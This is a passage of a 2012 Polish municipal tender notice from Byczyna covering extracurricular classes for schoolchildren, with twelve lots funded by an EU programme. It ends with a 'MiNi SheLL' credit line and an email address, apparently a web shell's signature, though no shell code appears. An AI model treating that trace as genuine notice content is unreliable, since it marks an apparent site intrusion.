<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	formularz oferty przetargowej /zał. nr 1do SIWZ/, 
b)	dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.byczyna.pl, www.byczyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Byczynie
ul. Rynek 1
46-220 Byczyna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2012 godzina 09:00, miejsce: Urząd Miejski w Byczynie
ul. Rynek 1
46-220 Byczyna
pokój nr 19, I piętro (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest dofinansowany z Programu Operacyjnego Kapitał Ludzki.
Priorytet: IX. Rozwój wykształcenia i kompetencji w regionach
Działanie: 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty
Poddziałanie: 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grupy o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I)	zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu - dla dzieci z grupy ryzyka dyslekcji rozwojowej(zajęcia specjalistyczne),.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia są przeznaczone dla dzieci ze specyficznymi trudnościami w uczeniu się oraz zagrożonych dysleksją. Specyfika zajęć przewiduje udział rodziców w zajęciach w celu zapewnienia kompetentnej pomocy uczniowi nie tylko w szkole, ale i w domu ze względu na nieodzowną ciągłość ćwiczeń. Praca odbywać się będzie w oparciu 
o najskuteczniejsze metody edukacyjno- terapeutyczne. Oczekiwane efekty to zminimalizowanie trudności uczniów 
w nauce oraz podniesienie samooceny uczniów.
Ze względu na specyfikę zajęć od prowadzących wymagane jest wykształcenie wyższe pedagogiczne oraz doświadczenie w pracy z uczniem o specyficznych trudnościach w czytaniu i pisaniu, doświadczenie w edukacji wczesnoszkolnej oraz w pracy pedagogicznej z uczniem i jego rodzicem, a także znajomość metod terapeutycznych przewidzianych programem edukacyjno- terapeutycznym Ortograffiti, znajomość metody P. Dennisona, programu rozwijającego percepcję wzrokową M. Frostig, D. Horne; ćwiczeń przygotowujących M. Bogdanowicz i M. Drożyńskiej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II)	zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu (zajęcia specjalistyczne),.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia są przeznaczone dla dzieci ze specyficznymi trudnościami w uczeniu się oraz zagrożonych dysleksją. Specyfika zajęć przewiduje udział rodziców w zajęciach w celu zapewnienia kompetentnej pomocy uczniowi nie tylko w szkole, ale i w domu ze względu na nieodzowną ciągłość ćwiczeń. Praca odbywać się będzie w oparciu 
o najskuteczniejsze metody edukacyjno- terapeutyczne. Oczekiwane efekty to zminimalizowanie trudności uczniów 
w nauce oraz podniesienie samooceny uczniów.
Ze względu na specyfikę zajęć od prowadzących wymagane jest wykształcenie wyższe pedagogiczne oraz doświadczenie w pracy z uczniem o specyficznych trudnościach w czytaniu i pisaniu, doświadczenie w edukacji wczesnoszkolnej oraz w pracy pedagogicznej z uczniem i jego rodzicem, a także znajomość metod terapeutycznych przewidzianych programem edukacyjno- terapeutycznym Ortograffiti, znajomość metody P. Dennisona, programu rozwijającego percepcję wzrokową M. Frostig, D. Horne; ćwiczeń przygotowujących M. Bogdanowicz i M. Drożyńskiej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem zajęć jest wyrównywanie braków w wiadomościach i umiejętnościach matematycznych uczniów, dla których te braki są przyczyną niepowodzeń szkolnych. Specyfika zajęć oraz ich atrakcyjność (np. nauka przez zabawę) mają umożliwić niwelowanie trudności, trenować umiejętność skupienia się na zadaniu, zwiększać motywację do pokonywania trudności.  Ryzyko porażki na lekcji w klasie staje się (główny cel zajęć) znacznie mniejsze. Zajęcia muszą przewidywać: indywidualizację, rozwijanie zainteresowań, różnorodność wykonywanych zadań, wyzwalanie twórczej aktywności pozwoli uczniom lepiej funkcjonować w zespołach klasowych.
Od prowadzącego wymagane jest wykształcenie wyższe pedagogiczne, doświadczenie w pracy w edukacji wczesnoszkolnej. Istotna jest znajomość zakwalifikowanych uczestników i bardzo dokładne zdiagnozowanie ich braków edukacyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV
Zajęcia z gimnastyki korekcyjnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W PSP im. J. Zamojskiego w Byczynie od czterech lat realizowany jest program przeciwdziałania wadom postawy 
u dzieci i młodzieży w województwie opolskim. Zajęcia wymagają ustawicznej pracy z uczniem, począwszy od zakwalifikowania go na zajęcia gimnastyki korekcyjnej, poprzez monitorowanie udziału i zaangażowania w ćwiczenia uczestników zajęć, a skończywszy na wyjazdach na specjalistyczne badania. Udział w zajęciach uczniów objętych programem Nowe szanse- edukacja w szkołach podstawowych Gminy Byczyna ma umożliwić aktywny udział 
w zajęciach gimnastyki korekcyjnej jeszcze większej grupy dzieci z  PSP Byczyna.  Efektem zajęć ma być nabycie przez uczestników nawyku prawidłowej postawy ciała oraz świadomość istotnej roli prawidłowej postawy dla zdrowia
i rozwoju. Niezbędny jest program nauczania dostosowany do korygowania wad postawy u dzieci i młodzieży.
Od prowadzącego wymagane jest wykształcenie wyższe pedagogiczne oraz specjalizacja z gimnastyki korekcyjnej, jak również doświadczenie w pracy z uczniami z wadami postawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> V)	zajęcia korekcyjno - kompensacyjne, zajęcia z terapii pedagogicznej dla uczniów klasy I  (zajęcia specjalistyczne).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia przeznaczone są dla uczniów ze specyficznymi trudnościami w uczeniu się i zachowaniu. Celem zajęć jest praca nad relacjami uczniów w grupie rówieśniczej oraz relacjami w kontaktach uczeń- nauczyciel. Zajęcia korekcyjno- kompensacyjne wymagają gruntownej znajomości środowiska domowego uczniów, współpracy 
z rodzicami, opiekunami dzieci oraz znajomości trudności dziecka, indywidualizacji pracy przy jednoczesnym wdrażaniu w umiejętności pracy w zespole klasowym. Korygowanie zachowań oraz niwelowanie trudności w uczeniu się ma pozwolić uczestnikom na osiąganie sukcesów na miarę swoich możliwości w zespole klasowym.
Ze względu na specyfikę zajęć prowadzący muszą legitymować się wykształceniem wyższym pedagogicznym, doświadczeniem w zakresie kształcenia umiejętności społecznych najmłodszych, posiadać kwalifikacje w zakresie rewalidacji lub oligofrenopedagogiki lub terapii pedagogicznej. Niezbędna jest znajomość środowiska uczniów zakwalifikowanych na zajęcia, gruntowna diagnoza trudności oraz dobór odpowiednich metod terapeutycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> VI)	zajęcia korekcyjno - kompensacyjne, zajęcia z terapii pedagogicznej dla uczniów klasy II  (zajęcia specjalistyczne)*,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia przeznaczone są dla uczniów ze specyficznymi trudnościami w uczeniu się i zachowaniu. Celem zajęć jest praca nad relacjami uczniów w grupie rówieśniczej oraz relacjami w kontaktach uczeń- nauczyciel. Zajęcia korekcyjno- kompensacyjne wymagają gruntownej znajomości środowiska domowego uczniów, współpracy 
z rodzicami, opiekunami dzieci oraz znajomości trudności dziecka, indywidualizacji pracy przy jednoczesnym wdrażaniu w umiejętności pracy w zespole klasowym. Korygowanie zachowań oraz niwelowanie trudności w uczeniu się ma pozwolić uczestnikom na osiąganie sukcesów na miarę swoich możliwości w zespole klasowym.
Ze względu na specyfikę zajęć prowadzący muszą legitymować się wykształceniem wyższym pedagogicznym, doświadczeniem w zakresie kształcenia umiejętności społecznych najmłodszych, posiadać kwalifikacje w zakresie rewalidacji lub oligofrenopedagogiki lub terapii pedagogicznej. Niezbędna jest znajomość środowiska uczniów zakwalifikowanych na zajęcia, gruntowna diagnoza trudności oraz dobór odpowiednich metod terapeutycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> VII)	zajęcia korekcyjno - kompensacyjne, zajęcia rewalidacyjne dla uczniów klasy I  (zajęcia specjalistyczne),.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia przeznaczone są dla uczniów ze specyficznymi trudnościami w uczeniu się i zachowaniu. Celem zajęć jest praca nad relacjami uczniów w grupie rówieśniczej oraz relacjami w kontaktach uczeń- nauczyciel. Zajęcia korekcyjno- kompensacyjne wymagają gruntownej znajomości środowiska domowego uczniów, współpracy 
z rodzicami, opiekunami dzieci oraz znajomości trudności dziecka, indywidualizacji pracy przy jednoczesnym wdrażaniu w umiejętności pracy w zespole klasowym. Korygowanie zachowań oraz niwelowanie trudności w uczeniu się ma pozwolić uczestnikom na osiąganie sukcesów na miarę swoich możliwości w zespole klasowym.
Ze względu na specyfikę zajęć prowadzący muszą legitymować się wykształceniem wyższym pedagogicznym, doświadczeniem w zakresie kształcenia umiejętności społecznych najmłodszych, posiadać kwalifikacje w zakresie rewalidacji lub oligofrenopedagogiki lub terapii pedagogicznej. Niezbędna jest znajomość środowiska uczniów zakwalifikowanych na zajęcia, gruntowna diagnoza trudności oraz dobór odpowiednich metod terapeutycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> VIII)	zajęcia korekcyjno - kompensacyjne, zajęcia rewalidacyjne dla uczniów klasy II, w tym uczniów 
z orzeczeniem o niepełnosprawności  (zajęcia specjalistyczne)*,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia przeznaczone są dla uczniów ze specyficznymi trudnościami w uczeniu się i zachowaniu. Celem zajęć jest praca nad relacjami uczniów w grupie rówieśniczej oraz relacjami w kontaktach uczeń- nauczyciel. Zajęcia korekcyjno- kompensacyjne wymagają gruntownej znajomości środowiska domowego uczniów, współpracy 
z rodzicami, opiekunami dzieci oraz znajomości trudności dziecka, indywidualizacji pracy przy jednoczesnym wdrażaniu w umiejętności pracy w zespole klasowym. Korygowanie zachowań oraz niwelowanie trudności w uczeniu się ma pozwolić uczestnikom na osiąganie sukcesów na miarę swoich możliwości w zespole klasowym.
Ze względu na specyfikę zajęć prowadzący muszą legitymować się wykształceniem wyższym pedagogicznym, doświadczeniem w zakresie kształcenia umiejętności społecznych najmłodszych, posiadać kwalifikacje w zakresie rewalidacji lub oligofrenopedagogiki lub terapii pedagogicznej. Niezbędna jest znajomość środowiska uczniów zakwalifikowanych na zajęcia, gruntowna diagnoza trudności oraz dobór odpowiednich metod terapeutycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część IX
Zajęcia w ramach kółka przyrodniczo- ekologicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Na zajęcia kółka przyrodniczo- ekologicznego będą uczęszczali uczniowie chcący poszerzać swoje zainteresowania przyrodnicze. Zamawiający przewiduje, że większość zajęć  to zajęcia/ warsztaty, również w terenie. Ze względu na to, iż uczestnikami są najmłodsi uczniowie, zajęcia muszą mieć atrakcyjną formę, a metody i narzędzia muszą być dostosowane do możliwości percepcyjnych uczestników. Celem jest przygotowanie do działań ekologicznych oraz motywowanie do świadomego uczestniczenia w różnego rodzaju aktywności uczniowskiej ukierunkowanej na ochronę środowiska naturalnego, energii, wody, lasów.
Od prowadzącego wymagane jest wykształcenie wyższe pedagogiczne, doświadczenie w edukacji wczesnoszkolnej. Wymagane jest, aby w trakcie zajęć prowadzący zorganizował spotkania z instytucjami zdecydowanymi na współpracę- przyrodnicze, ekologiczne prelekcje, warsztaty, zajęcia w terenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Część X
Zajęcia taneczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia taneczne mają za zadanie rozwijanie w uczestnikach  muzykalności, wrażliwości muzycznej, umiejętności tanecznych. Zajęcia taneczne mają dotyczyć w znacznej mierze nauki polskich tańców ludowych. Zajęcia dają ogromną szansę realizacji pasji, prezentowania się na forum szkoły, w środowisku lokalnym oraz na festiwalach, konkursach tanecznych. Uczestnicy mają możliwość integrowania się z grupą i wraz z nią aktywnego udziału w kulturze. Ze względu na to, iż zajęcia taneczne wymagają wielu ćwiczeń i prób, są alternatywną, aktywną forma spędzania wolnego czasu. Zwykle uwieńczoną sukcesem.
Od prowadzącego zajęcia wymagają wykształcenia wyższego pedagogicznego, doświadczenia w pracy twórczej 
z dziećmi i młodzieżą, dyspozycyjności i dużej ilości czasu poświęcanego na próby oraz wyjazdy. Zadaniem prowadzącego zajęcia będzie również określenie wymogów co do zakupu strojów ludowych odpowiadających swoim charakterem tańcom, których nauka będzie prowadzona w trakcie zajęć, z uwzględnieniem potrzeb szkoły. Prowadzący zajęcia musi legitymować się wykształceniem w zakresie:  pedagogika tańca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Część XI
Zajęcia śpiewu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Główny cel  zajęć to praca z uczniem uzdolnionym muzycznie i pragnącym rozwijać swoją pasję w tym kierunku. 
Zakres zajęć obejmie kształtowanie  głosu i umiejętność posługiwania się nim, rozwijanie słuchu muzycznego oraz pobudzanie wrażliwości intonacyjno-emisyjnej. Uzyskane efekty zajęć to również wyrobienie umiejętności artystycznego wykonywania pieśni chóralnych i solowych, nadawanie im indywidualnego wyrazu interpretacyjnego oraz nauka podstawowych ruchów dyrygenta.
Zajęcia będą polegały także na nauce gry na  instrumentach perkusyjnych, dętych i  klawiszowych.
Nauczyciel prowadzący powinien mieć kwalifikacje wyższe pedagogiczne z przygotowaniem do nauczania muzyki 
z elementami dyrygentury. Ze względu na wiek uczestników (uczniowie klas I- III) niezbędne są kwalifikacje do edukacji wczesnoszkolnej oraz doświadczenie w pracy z dziećmi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Część XII
Zajęcia plastyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia plastyczne w każdej szkole są jedną z najatrakcyjniejszych, ulubionych również przez najmłodszych uczniów, form zajęć pozalekcyjnych. W PSP im. J. Zamojskiego są one tradycyjnie ukierunkowane na rozwijanie talentu, umiejętności i zdolności artystycznych, ale też na pracę na rzecz szkoły- wystawy prac, dekorowanie hollu szkolnego, wykonywanie prac na kiermasze i akcje charytatywne. Taki jest również cel pracy z najmłodszymi w ramach realizowanego programu. Praca twórcza z najmłodszymi ma zostać uwieńczona wystawą propagującą zasadę równości. 
Od prowadzącego wymagane jest wykształcenie wyższe pedagogiczne, wykształcenie w kierunku plastyka, doświadczenie w pracy z najmłodszymi uczniami ze względu na konieczność  doboru odpowiednich do wieku 
i możliwości metod i narzędzi pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com